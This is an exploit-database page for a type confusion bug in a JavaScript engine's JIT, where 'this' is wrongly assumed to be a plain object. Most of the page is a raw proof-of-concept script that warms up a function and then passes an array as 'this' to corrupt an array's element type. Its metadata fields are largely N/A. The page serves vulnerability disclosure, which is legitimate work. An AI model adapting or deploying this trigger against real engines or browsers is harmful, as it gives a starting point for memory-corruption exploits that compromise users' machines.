header-logo
Suggest Exploit
vendor:
N/A
by:
Anonymous
8.8
CVSS
HIGH
Type Confusion
843
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: JavaScript
2020

Type Confusion in JavaScript

This vulnerability occurs when the type of the 'this' object is assumed to be an object, but it can be other objects like an array. This can lead to operations on 'this' not being checked properly, which can lead to type confusion. The PoC code shows how this vulnerability can be exploited by calling the opt() function with an array as the 'this' object.

Mitigation:

Ensure that the type of the 'this' object is properly checked before performing any operations on it.
Source

Exploit-DB raw data:

/*
LdThis instructions' value type is assumed to be "Object". Since "this" can be other objects like an array, it has to be assumed to be "LikelyObject", otherwise, operations to "this" will not be checked properly.

PoC:
*/

function opt(arr) {
    arr[0] = 1.1;
    this[0] = {};
    arr[0] = 2.3023e-320;
}

function main() {
    let arr = [1.1];
    for (let i = 0; i < 10000; i++) {
        opt.call({}, arr);
    }

    opt.call(arr, arr);
    print(arr);
}

main();

Navigation

Suggest Exploit

Services By CQR